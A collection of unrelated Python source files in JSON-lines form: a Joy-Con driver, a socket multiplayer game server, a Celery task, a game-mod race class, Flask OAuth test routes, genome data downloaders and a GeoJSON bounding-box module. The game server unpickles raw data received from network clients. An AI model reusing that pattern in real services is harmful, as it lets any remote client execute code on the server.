IndexError('sample_idx should be between 0 and 2')\n data = self._to_int16le_from_2bytes(\n input_report[15 + sample_idx * 12],\n input_report[16 + sample_idx * 12])\n return data * self._ACCEL_COEFF_Y * (1 if self.is_left() else -1)\n\n def get_accel_z(self, input_report=None, sample_idx=0):\n if not input_report:\n input_report = self._input_report\n\n if sample_idx not in (0, 1, 2):\n raise IndexError('sample_idx should be between 0 and 2')\n data = self._to_int16le_from_2bytes(\n input_report[17 + sample_idx * 12],\n input_report[18 + sample_idx * 12])\n return data * self._ACCEL_COEFF_Z * (1 if self.is_left() else -1)\n\n def get_status(self) -> dict:\n return {\n \"battery\": {\n \"charging\": self.get_battery_charging(),\n \"level\": self.get_battery_level(),\n },\n \"buttons\": {\n \"right\": {\n \"y\": self.get_button_y(),\n \"x\": self.get_button_x(),\n \"b\": self.get_button_b(),\n \"a\": self.get_button_a(),\n \"sr\": self.get_button_right_sr(),\n \"sl\": self.get_button_right_sl(),\n \"r\": self.get_button_r(),\n \"zr\": self.get_button_zr(),\n },\n \"shared\": {\n \"minus\": self.get_button_minus(),\n \"plus\": self.get_button_plus(),\n \"r-stick\": self.get_button_r_stick(),\n \"l-stick\": self.get_button_l_stick(),\n \"home\": self.get_button_home(),\n \"capture\": self.get_button_capture(),\n \"charging-grip\": self.get_button_charging_grip(),\n },\n \"left\": {\n \"down\": self.get_button_down(),\n \"up\": self.get_button_up(),\n \"right\": self.get_button_right(),\n \"left\": self.get_button_left(),\n \"sr\": self.get_button_left_sr(),\n \"sl\": self.get_button_left_sl(),\n \"l\": self.get_button_l(),\n \"zl\": self.get_button_zl(),\n }\n },\n \"analog-sticks\": {\n \"left\": {\n \"horizontal\": self.get_stick_left_horizontal(),\n \"vertical\": self.get_stick_left_vertical(),\n },\n \"right\": {\n \"horizontal\": self.get_stick_right_horizontal(),\n \"vertical\": self.get_stick_right_vertical(),\n },\n },\n \"accel\": self.get_accels(),\n }\n\n def disconnect_device(self):\n self._write_output_report(b'\\x01', b'\\x06', b'\\x00')\n\n\nif __name__ == '__main__':\n import pyjoycon.device as d\n ids = d.get_L_id() if None not in d.get_L_id() else d.get_R_id()\n\n if None not in ids:\n joycon = JoyCon(*ids)\n lamp_pattern = 0\n while True:\n print(joycon.get_status())\n joycon.set_player_lamp_on(lamp_pattern)\n lamp_pattern = (lamp_pattern + 1) & 0xf\n time.sleep(0.2)\n","repo_name":"redphx/joydance","sub_path":"pycon/joycon.py","file_name":"joycon.py","file_ext":"py","file_size_in_byte":16582,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"63"} +{"seq_id":"5266107129","text":"import socket\nfrom _thread import *\nimport sys\nfrom planet import Planet\nimport pickle\n\nif len(sys.argv)!=3:\n print(\"usage: \",sys.argv[0],\" 192.168.1.1 5555\")\n print(\"use your IP address in place of 192.168.1.1 and an open port in place of 5555\")\n exit()\n \n#socket allows for incoming connections\n#server = \"192.168.0.110\"\n#port = 5555\nserver = sys.argv[1]\nport = int(sys.argv[2])\n\n#IPV4\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ntry:\n s.bind((server,port))\nexcept socket.error as e:\n print(e)\n\ndef getY(srcobject):\n return srcobject.position[1]\n\n#instantiate local planets\nearth = Planet()\nearth.size = 10\nearth.position = [0.0,0.0,0.0]\nearth.resources = [32.0,192.0,128.0]\nplanets = [earth]\n\nfor i in range(40):\n planets = planets+[Planet()]\n\nplanets.sort(key = getY)\n\nfor i in range(41):\n planets[i].index = i\n\n\n#listen for up to 10 connections\nmaxPlayers = 10\ns.listen(maxPlayers)\nprint(\"Waiting for connection...\")\n\nplayerLock = allocate_lock()\nplayers = 0\nplayerSlots = [False]*maxPlayers\nplayersAt = [-1]*maxPlayers\nmessageQueues = [\"\"]*maxPlayers#I might need a lock\n\ndef threaded_client(conn):\n global playerSlots\n global players\n\n #find our player number so the server can share things between threads\n playerLock.acquire()\n players+=1\n playerNumb=0\n print(playerSlots)\n while playerSlots[playerNumb]:\n playerNumb+=1\n print(playerNumb)\n print(playerNumb)\n playerSlots[playerNumb]=True\n playerLock.release()\n \n conn.send(pickle.dumps(planets))\n reply = \"\"\n at = None\n while True:\n try:\n #object truancy occurs if object too big to fit\n data = conn.recv(2048)\n reply = pickle.loads(data)\n\n if not data:\n print(\"Disconnected\")\n break\n else:\n print(\"Recv: \",reply)\n if(len(reply)==1):\n if(reply[0]==\"depart\"):\n playersAt[playerNumb] = -1\n at = None\n if(len(reply)==2):\n if(reply[0]==\"arrive\"):\n at = reply[1]\n playersAt[playerNumb] = reply[1]\n if(reply[0]==\"listen\"):\n at = reply[1]\n playersAt[playerNumb] = reply[1]\n reply = planets[reply[1]].listen()\n if(len(messageQueues[playerNumb])):\n reply = messageQueues[playerNumb]\n messageQueues[playerNumb] = \"\"\n if(len(reply)==3):\n if(reply[0]==\"talk\"):\n print(playerNumb,\" is talking at: \",reply[1],\" saying \",reply[2])\n print(playersAt)\n print(playerSlots)\n print(messageQueues)\n for index in range(maxPlayers):\n if index != playerNumb and reply[1] != -1 and playersAt[index] == reply[1] and playerSlots[index]:\n print(\"found \",index)\n messageQueues[index]+=reply[2]\n print(messageQueues)\n reply = planets[reply[1]].talk(reply[2])\n print(\"Sending: \",reply)\n\n conn.sendall(pickle.dumps(reply))\n except:\n break\n print(\"Error in connection loop\")\n conn.close()\n playerLock.acquire()\n players -=1\n playerSlots[playerNumb] = False\n playerLock.release()\n \nwhile True:\n #oh right because python does pattern matching :D\n conn, adr = s.accept()\n print(\"Connected to:\", adr)\n\n start_new_thread(threaded_client, (conn,))\n \n","repo_name":"drewmacrae/Orrery","sub_path":"connectorServer.py","file_name":"connectorServer.py","file_ext":"py","file_size_in_byte":3773,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"27968504695","text":"import json\n\nfrom django_celery_beat.models import PeriodicTask, IntervalSchedule\n\nfrom listam_bot.celery import app\nfrom subscriptions.models import Subscription\nfrom spider import crawl_and_send_new_ads_to_user\n\n\ndef add_crawling_task(subscription_id):\n schedule, created = IntervalSchedule.objects.get_or_create(\n every=120,\n period=IntervalSchedule.SECONDS,\n )\n\n PeriodicTask.objects.create(\n interval=schedule,\n name=\"Send new ads for subscription {}\".format(subscription_id),\n task=\"subscriptions.tasks.send_new_ads\",\n kwargs=json.dumps({\"subscription_id\": subscription_id}),\n )\n\n\ndef remove_crawling_task(subscription_id):\n PeriodicTask.objects.filter(\n name=\"Send new ads for subscription {}\".format(subscription_id)\n ).delete()\n\n\n@app.task\ndef send_new_ads(subscription_id):\n subscription = Subscription.objects.get(id=subscription_id)\n crawl_and_send_new_ads_to_user(\n chat_id=subscription.chat_id,\n last_ad=subscription.last_ad,\n subscription_id=subscription_id,\n )\n","repo_name":"9z06/listam_bot","sub_path":"subscriptions/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"1602980720","text":"from ..tools.BaseClasses import baseRace, Skill\nfrom ..tools import DamageTypes\n\nimport es, playerlib, gamethread\nfrom random import randint\n\nclass Predator( baseRace ):\n\tdef __init__( self ):\n\t\tself.WeaponsCanOnlyUse = ['Knife', 'Grenades']\n\n\t\tself.RaceAbbreviation = 'Pred'\n\t\tself.RaceColor = '#black'\n\n\t\tself.RacePrefix = '[K]'\n\t\tself.RaceName = 'Predator'\n\t\tself.RaceTypes = ['humanoid', 'monster', 'alien']\n\t\tself.Coder = 'MrCoolness & Mini Dude'\n\t\tself.UltimateCooldown = 25\n\t\tself.StartingUltimateCooldown = 10\n\n\t\tself.PlayerLimit = 0\n\t\tself.RequiredLevel = 14\n\t\tself.ChangeRaceIndex = 20\n\n\t\tself.SkillList = [\n\t\t\tSkill( 'Poison Blade', 'Your knife attacks slow people!' , 0, 0 ),\n\t\t\tSkill( 'Pounce' , 'Leap towards your enemy.' , 5, 0 ),\n\t\t\tSkill( 'Stealth' , 'You hide well when lurking for prey.' , 5, 0 ),\n\t\t\tSkill( 'Vanish' , 'Your remaining enemies are baffled after your first strike.' , 5, 0 ),\n\t\t\tSkill( 'Gobble' , 'The flesh of your enemy gives you strength.' , 5, 0 ),\n\t\t\tSkill( 'Ravage' , '[Ultimate] You become more vicious.' , 5, 8 )\n\t\t]\n\n\tdef player_spawn( self, ev, skills ):\n\t\twcsPlayer = self.helper.players[ str(ev['userid']) ]\n\n\t\t# lvl = skills['Poison Blade']\n\t\tslow = 0.5\n\t\tself.helper.raceTell( self, wcsPlayer, '#goodPoison Blade #defslows your victims by #good%i#def!' % int(slow*100) )\n\n\t\twcsPlayer = self.helper.getPlayer( wcsPlayer )\n\t\twcsPlayer.speed = 1\n\n\t\tlvl = skills['Pounce']\n\t\tif ( lvl > 0 ):\n\t\t\t# slow the player initially\n\t\t\tgamethread.delayed( 2, setattr, ( wcsPlayer, 'speed', 0.5 ) )\n\n\t\t\tmultiplier = 0.5 + ( lvl * 0.5 ) # 300%\n\t\t\tself.helper.raceTell( self, wcsPlayer, '#goodPounce #defcauses you to jump #good%i%% #deffarther.' % int( multiplier*100 ) )\n\n\t\tlvl = skills['Stealth']\n\t\tif ( lvl > 0 ):\n\t\t\tinvis = 0.4 + ( lvl * 0.08 ) # 80%\n\t\t\tself.RaceTools.setColor( wcsPlayer, 1, 1, 1, ( 1 - invis ) )\n\t\t\tself.helper.raceTell( self, wcsPlayer, '#goodStealth #defprovides you with #good%i%% #definvis!' % int( invis*100 ) )\n\n\t\tlvl = skills['Vanish']\n\t\tif ( lvl > 0 ):\n\t\t\tduration = 0.5 + ( lvl * 0.2 )\n\t\t\tself.helper.raceTell( self, wcsPlayer, '#goodVanish #defcauses you to go #good100%% #definvisible for #good%i #defseconds when you attack!' % int( duration ) )\n\n\t\tlvl = skills['Gobble']\n\t\tif ( lvl > 0 ):\n\t\t\tchance = 25 + ( lvl * 5 )\n\t\t\thp = 10 + lvl\n\t\t\tself.helper.raceTell( self, wcsPlayer, '#goodGobble #defgrants a #good%i%% #defchance to gain #good%i #defhealth when you #redattack#def.' % ( chance, hp ) )\n\n\t\tlvl = skills['Ravage']\n\t\tif ( lvl > 0 ):\n\t\t\twcsPlayer.infoPredatorRavage = False\n\n\tdef player_jump( self, ev, skills ):\n\t\twcsPlayer = self.helper.players[ str(ev['userid']) ]\n\n\t\tlvl = skills['Pounce']\n\t\tif ( lvl > 0 ):\n\t\t\tmultiplier = 0.5 + ( lvl * 0.5 )\n\n\t\t\tself.RaceTools.longJump( wcsPlayer, multiplier, 800, 400 )\n\n\t\t\t# x = es.getplayerprop( wcsPlayer, 'CBasePlayer.localdata.m_vecVelocity[0]' )\n\t\t\t# y = es.getplayerprop( wcsPlayer, 'CBasePlayer.localdata.m_vecVelocity[1]' )\n\n\t\t\t# if (\n\t\t\t# \tx < 800 and x > -800 and\n\t\t\t# \ty < 800 and y > -800\n\t\t\t# ):\n\n\t\t\t# \tx *= multiplier\n\t\t\t# \ty *= multiplier\n\n\t\t\t# \tx = max( -400, min( x, 400 ) )\n\t\t\t# \ty = max( -400, min( y, 400 ) )\n\n\t\t\t# \tif (\n\t\t\t# \t\tx <= 1200 and x >= -1200 and\n\t\t\t# \t\ty <= 1200 and y >= -1200\n\t\t\t# \t ):\n\n\t\t\t# \t\t# es.msg( (x,y) )\n\t\t\t# \t\t# for some reason he goes to high push him down a bit\n\t\t\t# \t\tself.RaceTools.pushToPoint( player, x, y, 0 )\n\t\t\t# \t\t# self.RaceTools.pushToPoint( player, x, y, -25 )\n\n\tdef player_air( self, ev, skills ):\n\t\twcsPlayer = self.helper.players[ str(ev['userid']) ]\n\n\t\tlvl = skills['Pounce']\n\t\tif ( lvl > 0 ):\n\t\t\twcsPlayer.speed += 0.5\n\n\tdef player_land( self, ev, skills ):\n\t\twcsPlayer = self.helper.players[ str(ev['userid']) ]\n\n\t\tlvl = skills['Pounce']\n\t\tif ( lvl > 0 ):\n\t\t\twcsPlayer.speed -= 0.5\n\n\tdef player_attack( self, ev, skills ):\n\t\twcsAttacker = self.helper.players[ str(ev['attacker']) ] # us\n\t\twcsVictim = self.helper.players[ str(ev['userid' ]) ]\n\n\t\t# apply the posion blade affect\n\t\tself.RaceTools.slowPlayer( wcsVictim, 0.5, 1 )\n\n\t\tlvl = skills['Vanish']\n\t\tif ( lvl > 0 ):\n\t\t\tduration = 0.5 + ( lvl * 0.2 )\n\n\t\t\toldAlpha = wcsAttacker.alpha\n\n\t\t\t# whatever his alpha is, remove it\n\t\t\twcsAttacker.alpha -= oldAlpha\n\n\t\t\t# make is so when someones cursor is over you, it doesn't show your name\n\t\t\tes.setplayerprop( wcsAttacker, 'CBaseAnimating.m_nHitboxSet', 2 )\n\n\t\t\tself.helper.raceTell( self, wcsAttacker, '#goodVanish #defhides you for #good%i #defseconds!' % int( duration ) )\n\n\t\t\t# then delay to set it back\n\t\t\tgamethread.delayed( duration, self.VanishOff, ( wcsAttacker, oldAlpha ) )\n\n\t\t\t# if you set this to '1' when people look at you, it will crash their game\n\t\t\tgamethread.delayed( duration, es.setplayerprop, ( wcsAttacker, 'CBaseAnimating.m_nHitboxSet', 0 ) )\n\n\t\tlvl = skills['Gobble']\n\t\tif ( lvl > 0 ):\n\t\t\tchance = 25 + ( lvl * 5 )\n\t\t\trand = randint( 1, 100 )\n\t\t\tif ( chance >= rand ):\n\t\t\t\thp = 10 + lvl\n\t\t\t\twcsAttacker.attacker.health += hp\n\n\t\t\t\tself.helper.raceTell( self, wcsAttacker, '#goodGobble #defgains you #good%i #defhealth!' % hp )\n\n\t\tlvl = skills['Ravage']\n\t\tif ( lvl > 0 and wcsAttacker.infoPredatorRavage ):\n\t\t\tdamage = ev['dmg_health']\n\n\t\t\t# range of the bonus damage\n\t\t\tbonusDamage = randint( lvl*5, lvl*10 )\n\n\t\t\tself.helper.raceTell( self, wcsAttacker, '#goodRavage #defdeals #good%i #defbonus damage to #name%s#def.' % ( bonusDamage, wcsVictim.player.name ) )\n\t\t\tself.helper.raceTell( self, wcsVictim , '#name%s #defdeals #bad%i #defravage damage!' % ( wcsAttacker.player.name, bonusDamage ))\n\n\t\t\treturn ( damage + bonusDamage )\n\n\tdef player_hurt( self, ev, skills ):\n\t\tdamageType = ev['damage_type']\n\n\t\t# if the damage type is fall damage, prevent it\n\t\tif ( damageType & DamageTypes.DMG_FALL ):\n\t\t\treturn 0\n\n\tdef player_ultimate( self, ev, skills ):\n\t\twcsPlayer = self.helper.players[ str(ev['userid']) ]\n\n\t\tlvl = skills['Ravage']\n\t\tif ( lvl > 0 ):\n\n\t\t\tduration = lvl\n\t\t\tdamage = lvl * 10\n\n\t\t\tself.helper.raceTell( self, wcsPlayer, '#goodRavage #defgrants you #redup to #good%i #defbonus damage #redrandomly #deffor #good%i #defseconds!' % ( damage, duration ) )\n\n\t\t\t# turn it on\n\t\t\twcsPlayer.infoPredatorRavage = True\n\n\t\t\t# turn it off\n\t\t\tgamethread.delayed( duration, setattr, ( wcsPlayer, 'infoPredatorRavage', False ) )\n\n\t\t\treturn True\n\n\tdef VanishOff( self, wcsPlayer, oldAlpha ):\n\t\twcsPlayer.alpha += oldAlpha # no idea how to preform this opertion pragmatically\n","repo_name":"DerrikMilligan/CounterStrike-Warcraft-Mod","sub_path":"races/Predator.py","file_name":"Predator.py","file_ext":"py","file_size_in_byte":6688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"15569985196","text":"from flask import Blueprint, request, session, url_for\nfrom flask import render_template, redirect, jsonify\nfrom authlib.oauth2.rfc6749.grants.authorization_code import AuthorizationCodeGrant\nfrom .oauth2 import oauth_server\n\nfrom .libs.client_factory import ClientFactory\nfrom .model import User\nfrom ..app import db\n\nfrom typing import TYPE_CHECKING\n\nif TYPE_CHECKING:\n from authlib.integrations.flask_oauth2.authorization_server import AuthorizationServer\n from authlib.oauth2.rfc6749.wrappers import OAuth2Request\n from flask.wrappers import Response\n\nbp = Blueprint(\"index\", __name__, url_prefix=\"/index\")\n\n\n@bp.route(\"\", methods=(\"GET\", \"POST\"))\ndef index():\n return jsonify(message='index')\n\n\n@bp.route(\"/client\", methods=(\"POST\",))\ndef add_client():\n client = ClientFactory.get_client(client_name=\"test002\")\n\n db.session.add(client)\n db.session.commit()\n\n return jsonify(message='index')\n\n\n@bp.route(\"/auth\", methods=(\"POST\",))\ndef auth():\n # r = server.create_oauth2_request(request)\n\n return oauth_server.create_authorization_response(request)\n\n\n@bp.route(\"/grant/code\", methods=(\"POST\",))\ndef get_grant_code():\n user = User.query.get(1)\n authorization_code_grant: AuthorizationCodeGrant = oauth_server.get_consent_grant(\n end_user=user, # DB에 존재하는 사용자를 넣어준다.\n # request=request # 요청 데이터 그대로 넣어준다.\n )\n\n return jsonify(code=authorization_code_grant.generate_authorization_code())\n\n\n@bp.route(\"/grant/auth\", methods=(\"POST\",))\ndef get_grant_auth():\n user = User.query.get(1)\n grant: AuthorizationCodeGrant = oauth_server.get_consent_grant(end_user=user)\n\n response: Response = oauth_server.create_authorization_response(grant_user=user)\n\n return jsonify(\n status=response.status,\n redirect_uri=response.location,\n code=grant.generate_token(),\n )\n\n\n@bp.route(\"/grant/client_secret_post\", methods=(\"POST\",))\ndef get_grant_token():\n user = User.query.get(1)\n # auth를 통해 token을 발급받기 위해선 client secret도 필요함\n token_response = oauth_server.create_token_response(request=request)\n print(token_response)\n\n return token_response\n\n\n@bp.route(\"/grant\", methods=(\"POST\",))\ndef grant():\n \"\"\" 인증(auth)하기 전에 grant 설정 필요한 듯 \"\"\"\n\n # E.g :: 요청 데이터에 들어있는 사용자를 검증한다.\n user = User.query.get(1)\n\n # AuthorizationCodeGrant, 방식으로 인증된다.\n authorization_code_grant: AuthorizationCodeGrant = oauth_server.get_consent_grant(\n end_user=user, # DB에 존재하는 사용자를 넣어준다.\n # request=request # 요청 데이터 그대로 넣어준다.\n )\n redirec_uri = authorization_code_grant.validate_authorization_request()\n authorization_response = authorization_code_grant.create_authorization_response(\n redirect_uri=redirec_uri,\n grant_user=user\n )\n validate_token_request = authorization_code_grant.validate_token_request()\n\n print(\"*\" * 10)\n print(redirec_uri)\n print(authorization_response)\n print(validate_token_request)\n print(\"*\" * 10)\n\n # authorization_code_grant.create_token_response()\n\n return jsonify(index=\"template\")\n\n# oauth_request: OAuth2Request = oauth_server.create_oauth2_request(request=request)\n","repo_name":"jak010/study-flaskoauth-server","sub_path":"src/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"36322326438","text":"#!/usr/bin/env python3\n\"\"\"\nNote: This would look so much better replaced by XML or at least JSON. But\n is not worth to do it for now.\n\"\"\"\n\nimport os\nimport gzip\nimport urllib.request, urllib.error, urllib.parse\nimport logging\n\n\nclass LargeTestsData(object):\n \"\"\"\n Large index tests use quite big datasets. Make sure these\n are present before starting the time consuming tests.\n \"\"\"\n\n def __init__(self,bt2_path=''):\n self.data_dir = 'big_data'\n curr_path = os.path.realpath(bt2_path)\n\n curr_path = os.path.join(curr_path,'scripts')\n curr_path = os.path.join(curr_path,'test')\n self.data_dir_path = os.path.join(curr_path,self.data_dir)\n self.reads_dir_path = os.path.join(curr_path,'reads')\n\n try:\n os.stat(self.data_dir_path)\n except:\n logging.error(\"Cannot find the working datadir %s!\" % self.data_dir_path)\n raise\n\n self.genomes = dict()\n self.genomes['human'] = dict()\n hm = self.genomes['human']\n hm['link'] = \"ftp://hgdownload.cse.ucsc.edu/goldenPath/hg19/chromosomes/\"\n hm['ref_name'] = 'human.fa'\n hm['chromosomes'] = []\n chromosomes = hm['chromosomes']\n for i in range(1,22):\n chromosomes.append('chr%d' % i)\n chromosomes.extend(['chrX', 'chrY', 'chrM'])\n\n self.genomes['mouse'] = dict()\n ms = self.genomes['mouse']\n ms['link'] = \"ftp://hgdownload.cse.ucsc.edu/goldenPath/rn4/chromosomes\"\n ms['ref_name'] = 'mouse.fa'\n ms['chromosomes'] = []\n chromosomes = ms['chromosomes']\n for i in range(1,21):\n chromosomes.append('chr%d' % i)\n chromosomes.extend(['chrX', 'chrM'])\n\n self.joint_genomes = dict()\n self.joint_genomes['ms_hum'] = dict()\n mh = self.joint_genomes['ms_hum']\n mh['link'] = None\n mh['ref_name'] = 'ms_hum.fa'\n mh['genomes'] = ['human','mouse']\n\n self.init_data()\n\n\n\n def init_data(self):\n \"\"\" Try and init the data we need.\n \"\"\"\n for genome,gdata in list(self.genomes.items()):\n gn_path = os.path.join(self.data_dir_path,genome)\n gn_fasta = os.path.join(gn_path,gdata['ref_name'])\n if not os.path.exists(gn_fasta):\n self._get_genome(genome)\n self._build_genome(genome)\n\n for genome,gdata in list(self.joint_genomes.items()):\n gn_path = os.path.join(self.data_dir_path,genome)\n gn_fasta = os.path.join(gn_path,gdata['ref_name'])\n if not os.path.exists(gn_fasta):\n self._build_joint_genome(genome)\n\n\n\n def _get_genome(self,genome):\n g = self.genomes[genome]\n gn_path = os.path.join(self.data_dir_path,genome)\n\n if not os.path.exists(gn_path):\n os.mkdir(gn_path)\n\n logging.info(\"Downloading genome: %s \" % genome)\n\n for chrs in g['chromosomes']:\n chr_file = chrs + \".fa.gz\"\n fname = os.path.join(gn_path,chr_file)\n\n if os.path.exists(fname):\n logging.info(\"Skip %s (already present)\" % chr_file)\n continue\n\n uri = g['link'] + r\"/\" + chr_file\n logging.info(\"file: %s\" % chr_file)\n\n try:\n f = open(fname,'wb')\n u = urllib.request.urlopen(uri)\n f.write(u.read())\n except:\n f.close()\n os.remove(fname)\n os.close(u.fileno())\n raise\n else:\n os.close(u.fileno())\n u.close()\n f.close()\n\n\n\n def _build_genome(self,genome):\n g = self.genomes[genome]\n gn_path = os.path.join(self.data_dir_path,genome)\n gn_fasta = os.path.join(gn_path,g['ref_name'])\n\n logging.info(\"Building fasta file for genome: %s\" % genome)\n\n f_gn = open(gn_fasta,'wb')\n\n for chrs in g['chromosomes']:\n chr_file = chrs + \".fa.gz\"\n fname = os.path.join(gn_path,chr_file)\n\n try:\n f_chr = gzip.open(fname,'rb')\n f_gn.write(f_chr.read())\n except:\n f_chr_close()\n f_gn.close()\n os.remove(gn_fasta)\n raise\n else:\n f_chr.close()\n\n f_gn.close()\n\n\n\n def _build_joint_genome(self,genome):\n jg = self.joint_genomes[genome]\n jgn_path = os.path.join(self.data_dir_path,genome)\n jgn_fasta = os.path.join(jgn_path,jg['ref_name'])\n\n if not os.path.exists(jgn_path):\n os.mkdir(jgn_path)\n\n logging.info(\"Building fasta file for genome: %s\" % genome)\n\n f_jg = open(jgn_fasta,'wb')\n for g in jg['genomes']:\n gn_path = os.path.join(self.data_dir_path,g)\n fasta_file = os.path.join(gn_path,self.genomes[g]['ref_name'])\n try:\n fin = open(fasta_file,'rb')\n f_jg.write(fin.read())\n except:\n fin.close()\n f_jg.close()\n os.remove(jgn_fasta)\n raise\n else:\n fin.close()\n\n f_jg.close()\n\n\n\nclass ExampleData(object):\n \"\"\" The example data.\n \"\"\"\n\n def __init__(self,bt2_path=''):\n curr_path = os.path.realpath(bt2_path)\n curr_path = os.path.join(curr_path,'example')\n self.index_dir_path = os.path.join(curr_path,'index')\n self.reads_dir_path = os.path.join(curr_path,'reads')\n self.ref_dir_path = os.path.join(curr_path,'reference')\n\n try:\n os.stat(curr_path)\n except:\n logging.error(\"Cannot find the example datadir %s!\" % curr_path)\n raise\n","repo_name":"BenLangmead/bowtie2","sub_path":"scripts/test/btdata.py","file_name":"btdata.py","file_ext":"py","file_size_in_byte":5870,"program_lang":"python","lang":"en","doc_type":"code","stars":585,"dataset":"github-code","pt":"63"} +{"seq_id":"74207189960","text":"\"\"\" This module contains utility functions relating to bounding box\n calculations. This includes deriving a bounding box from an input GeoJSON\n shape file.\n\n Some of the functions in this module were written instead of using\n [the shapely Python package](https://shapely.readthedocs.io/en/latest/),\n as `shapely` does not handle antimeridian crossing when determining an\n encompassing bounding box of a GeoJSON input. The\n [GeoJSON specification](https://datatracker.ietf.org/doc/html/rfc7946#section-3.1.3)\n encourages users to split GeoJSON at the antimeridian, however, this is not\n enforced. When a user specifies a GeoJSON shape that crosses the\n antimeridian, HOSS will use an encompassing bounding box that also crosses\n the antimeridian.\n\n\"\"\"\nfrom collections import namedtuple\nfrom logging import Logger\nfrom typing import Dict, List, Optional, Tuple, Union\nimport json\n\nfrom harmony.message import Message\nfrom harmony.util import Config, download\nimport numpy as np\n\nfrom hoss.exceptions import InvalidInputGeoJSON, UnsupportedShapeFileFormat\n\n\nAggCoordinates = List[Tuple[float]]\nBBox = namedtuple('BBox', ['west', 'south', 'east', 'north'])\nCoordinates = Union[List[float], List[List[float]], List[List[List[float]]],\n List[List[List[List[float]]]]]\nGeoJSON = Union[Dict, List]\n\n\ndef get_harmony_message_bbox(message: Message) -> Optional[BBox]:\n \"\"\" Try to retrieve a bounding box from an input Harmony message. If there\n is no bounding box, return None.\n\n \"\"\"\n if message.subset is not None and message.subset.bbox is not None:\n bounding_box = BBox(*message.subset.process('bbox'))\n else:\n bounding_box = None\n\n return bounding_box\n\n\ndef get_request_shape_file(message: Message, working_dir: str,\n adapter_logger: Logger,\n adapter_config: Config) -> str:\n \"\"\" This helper function downloads the file specified in the input Harmony\n message via: `Message.subset.shape.href` and returns the local file\n path.\n\n \"\"\"\n if message.subset is not None and message.subset.shape is not None:\n if message.subset.shape.type != 'application/geo+json':\n raise UnsupportedShapeFileFormat(message.subset.shape.type)\n\n shape_file_url = message.subset.shape.process('href')\n adapter_logger.info('Downloading request shape file')\n local_shape_file_path = download(shape_file_url, working_dir,\n logger=adapter_logger,\n access_token=message.accessToken,\n cfg=adapter_config)\n else:\n local_shape_file_path = None\n\n return local_shape_file_path\n\n\ndef get_shape_file_geojson(local_shape_file_path: str) -> GeoJSON:\n \"\"\" Retrieve the shape file GeoJSON from the downloaded shape file provided\n by the Harmony request.\n\n \"\"\"\n with open(local_shape_file_path, 'r', encoding='utf-8') as file_handler:\n geojson_content = json.load(file_handler)\n\n return geojson_content\n\n\ndef get_geographic_bbox(geojson_input: GeoJSON) -> Optional[BBox]:\n \"\"\" This function takes a GeoJSON input and extracts the longitudinal and\n latitudinal extents from it. These extents describe a bounding box that\n minimally encompasses the specified shape.\n\n This function should be used in cases where the data within the granule\n are geographic. Some projections, particularly polar projections, will\n require further refinement of the GeoJSON shape.\n\n In the function below `contiguous_bboxes` and `contiguous_bbox` refer\n to bounding boxes that do not cross the antimeridian. Although, the\n GeoJSON specification recommends that GeoJSON shapes should be split to\n avoid crossing the antimeridian, user-supplied shape files may not\n conform to this recommendation.\n\n \"\"\"\n if 'bbox' in geojson_input:\n return get_bounding_box_lon_lat(geojson_input['bbox'])\n\n grouped_coordinates = aggregate_all_geometries(geojson_input)\n\n if len(grouped_coordinates) == 0:\n return None\n\n contiguous_bbox = get_contiguous_bbox(grouped_coordinates)\n antimeridian_bbox = get_antimeridian_bbox(grouped_coordinates)\n\n bbox_south, bbox_north = get_latitude_range(contiguous_bbox,\n antimeridian_bbox)\n\n if antimeridian_bbox is None:\n bbox_west = contiguous_bbox.west\n bbox_east = contiguous_bbox.east\n elif contiguous_bbox is None:\n bbox_west = antimeridian_bbox.west\n bbox_east = antimeridian_bbox.east\n elif (\n bbox_in_longitude_range(contiguous_bbox, -180, antimeridian_bbox.east)\n or bbox_in_longitude_range(contiguous_bbox, antimeridian_bbox.west, 180)\n ):\n # Antimeridian bounding box encompasses non-antimeridian crossing\n # bounding box\n bbox_west = antimeridian_bbox.west\n bbox_east = antimeridian_bbox.east\n elif ((antimeridian_bbox.east - contiguous_bbox.west)\n < (contiguous_bbox.east - antimeridian_bbox.west)):\n # Distance from contiguous bounding box west to antimeridian bounding\n # box east is shorter than antimeridian bounding box west to contiguous\n # bounding box east\n bbox_west = contiguous_bbox.west\n bbox_east = antimeridian_bbox.east\n else:\n # Distance from antimeridian bounding box west to contiguous bounding\n # box east is shorter than contiguous bounding box west to antimeridian\n # bounding box east\n bbox_west = antimeridian_bbox.west\n bbox_east = contiguous_bbox.east\n\n return BBox(bbox_west, bbox_south, bbox_east, bbox_north)\n\n\ndef get_contiguous_bbox(\n grouped_coordinates: List[AggCoordinates]\n) -> Optional[BBox]:\n \"\"\" Retrieve a bounding box that encapsulates all shape file geometries\n that do not cross the antimeridian.\n\n \"\"\"\n contiguous_bboxes = [[min(grouped_lons), min(grouped_lats),\n max(grouped_lons), max(grouped_lats)]\n for grouped_lons, grouped_lats in grouped_coordinates\n if len(grouped_lons) == 1\n or not crosses_antimeridian(grouped_lons)]\n\n if len(contiguous_bboxes) > 0:\n aggregated_extents = list(zip(*contiguous_bboxes))\n contiguous_bbox = BBox(min(aggregated_extents[0]),\n min(aggregated_extents[1]),\n max(aggregated_extents[2]),\n max(aggregated_extents[3]))\n else:\n contiguous_bbox = None\n\n return contiguous_bbox\n\n\ndef get_antimeridian_bbox(\n grouped_coordinates: List[AggCoordinates]\n) -> Optional[BBox]:\n \"\"\" Retrieve a bounding box that encapsulates all shape file geometries\n that cross the antimeridian. The output bounding box will also cross\n the antimeridian.\n\n \"\"\"\n antimeridian_bboxes = [\n get_antimeridian_geometry_bbox(grouped_lons, grouped_lats)\n for grouped_lons, grouped_lats in grouped_coordinates\n if len(grouped_lons) > 1\n and crosses_antimeridian(grouped_lons)\n ]\n\n if len(antimeridian_bboxes) > 0:\n aggregated_extents = list(zip(*antimeridian_bboxes))\n antimeridian_bbox = BBox(min(aggregated_extents[0]),\n min(aggregated_extents[1]),\n max(aggregated_extents[2]),\n max(aggregated_extents[3]))\n 